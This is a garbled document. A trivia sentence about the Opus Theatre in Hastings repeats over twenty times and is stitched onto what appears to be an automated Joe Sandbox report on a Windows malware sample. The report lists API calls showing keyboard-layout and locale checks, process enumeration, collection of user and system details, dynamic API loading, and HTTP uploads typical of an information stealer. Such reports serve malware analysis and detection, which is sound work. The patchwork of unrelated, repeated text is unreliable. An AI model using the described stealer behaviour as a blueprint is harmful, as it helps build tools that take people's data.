on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
Instruction ID: ab2078f5f47aa6eaeaf83cafc0758b5ab509dada1718e255d3e4d65f54e1cbb6
Opcode Fuzzy Hash: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
Instruction Fuzzy Hash: BA413F79740624ABD7109FE5FC4DADCBF70AB4C701BA08062F90A99190C7F993859B7D

Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
RtlAllocateHeap.NTDLL(00000000), ref: 00405021
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 004050DA
InternetCloseHandle.WININET(+aA), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Strings

+aA, xrefs: 00405051, 00405134
+aA, xrefs: 00405105, 0040508D, 00405090, 00405108

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
String ID: +aA$+aA
API String ID: 1337183907-2425922966
Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D

Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
LocalFree.KERNEL32(00000000), ref: 00417EB2

Strings

/ , xrefs: 00417E0F

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
Opcode Fuzzy Hash: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9

Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Process32First.KERNEL32(?,00000128), ref: 0041886E
Process32Next.KERNEL32(?,00000128), ref: 00418883

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

CloseHandle.KERNEL32(?), ref: 004188F1

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
Opcode Fuzzy Hash: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5

Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
wsprintfA.USER32 ref: 00417C47

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95

Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1

Function 00418060 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420E14), ref: 00418090
wsprintfA.USER32 ref: 004180A6

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5

Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02E38E68), ref: 00419BF1
GetProcAddress.KERNEL32(74DD0000,02E38E50), ref: 00419C0A
GetProcAddress.KERNEL32(74DD0000,02E38E98), ref: 00419C22
GetProcAddress.KERNEL32(74DD0000,02E38E80), ref: 00419C3A
GetProcAddress.KERNEL32(74DD0000,02E38DD8), ref: 00419C53
GetProcAddress.KERNEL32(74DD0000,02EB05F8), ref: 00419C6B
GetProcAddress.KERNEL32(74DD0000,02E32668), ref: 00419C83
GetProcAddress.KERNEL32(74DD0000,02E32688), ref: 00419C9C
GetProcAddress.KERNEL32(74DD0000,02E38DF0), ref: 00419CB4
GetProcAddress.KERNEL32(74DD0000,02E38E08), ref: 00419CCC
GetProcAddress.KERNEL32(74DD0000,02E38E20), ref: 00419CE5
GetProcAddress.KERNEL32(74DD0000,02E38E38), ref: 00419CFD
GetProcAddress.KERNEL32(74DD0000,02E32568), ref: 00419D15
GetProcAddress.KERNEL32(74DD0000,02EB1EF0), ref: 00419D2E
GetProcAddress.KERNEL32(74DD0000,02EB1DB8), ref: 00419D46
GetProcAddress.KERNEL32(74DD0000,02E328A8), ref: 00419D5E
GetProcAddress.KERNEL32(74DD0000,02EB1F20), ref: 00419D77
GetProcAddress.KERNEL32(74DD0000,02EB1DD0), ref: 00419D8F
GetProcAddress.KERNEL32(74DD0000,02E32608), ref: 00419DA7
GetProcAddress.KERNEL32(74DD0000,02EB1F08), ref: 00419DC0
GetProcAddress.KERNEL32(74DD0000,02E32848), ref: 00419DD8
LoadLibraryA.KERNEL32(02EB1DE8,?,00416CA0), ref: 00419DEA
LoadLibraryA.KERNEL32(02EB1F50,?,00416CA0), ref: 00419DFB
LoadLibraryA.KERNEL32(02EB1D70,?,00416CA0), ref: 00419E0D
LoadLibraryA.KERNEL32(02EB1ED8,?,00416CA0), ref: 00419E1F
LoadLibraryA.KERNEL32(02EB1D40,?,00416CA0), ref: 00419E30
GetProcAddress.KERNEL32(75A70000,02EB1FB0), ref: 00419E52
GetProcAddress.KERNEL32(75290000,02EB1F38), ref: 00419E73
GetProcAddress.KERNEL32(75290000,02EB1E60), ref: 00419E8B
GetProcAddress.KERNEL32(75BD0000,02EB1E30), ref: 00419EAD
GetProcAddress.KERNEL32(75450000,02E32628), ref: 00419ECE
GetProcAddress.KERNEL32(76E90000,02EB0638), ref: 00419EEF
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06

Strings

NtQueryInformationProcess, xrefs: 00419EFA

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

lstrlenA.KERNEL32(00000000), ref: 004051E3

Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
StrCmpCA.SHLWAPI(?,02EB7320), ref: 00405275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
HttpOpenRequestA.WININET(00000000,02EB7280,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004053F4

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,02EB7290,00000000,?,02E34B20,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
lstrlenA.KERNEL32(00000000), ref: 0040579B
GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
HeapAlloc.KERNEL32(00000000), ref: 004057B3
lstrlenA.KERNEL32(00000000), ref: 004057C8
memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
memcpy.MSVCRT(?), ref: 00405806
lstrlenA.KERNEL32(00000000), ref: 00405818
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
memcpy.MSVCRT(?), ref: 00405841
lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
InternetCloseHandle.WININET(00000000), ref: 00405901
InternetCloseHandle.WININET(00000000), ref: 0040590E
InternetCloseHandle.WININET(00000000), ref: 00405918

Strings

------, xrefs: 0040568B
------, xrefs: 00405407
", xrefs: 00405756
", xrefs: 00405614
------, xrefs: 004052E7
--, xrefs: 004052D0
------, xrefs: 00405549
", xrefs: 004054D2

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: a81d26ec91f96fbf8a05a8f5d715276f9c4e7b91fb0fb5aa956ae4b903f9e187
Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
Opcode Fuzzy Hash: a81d26ec91f96fbf8a05a8f5d715276f9c4e7b91fb0fb5aa956ae4b903f9e187
Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,02EB7320), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,02EB73C0), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,02EB7280,?,02EB6960,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

------, xrefs: 00404B78
", xrefs: 00404D83
", xrefs: 00404C42
------, xrefs: 00404CB9
------, xrefs: 00404A0D

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
Opcode Fuzzy Hash: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191
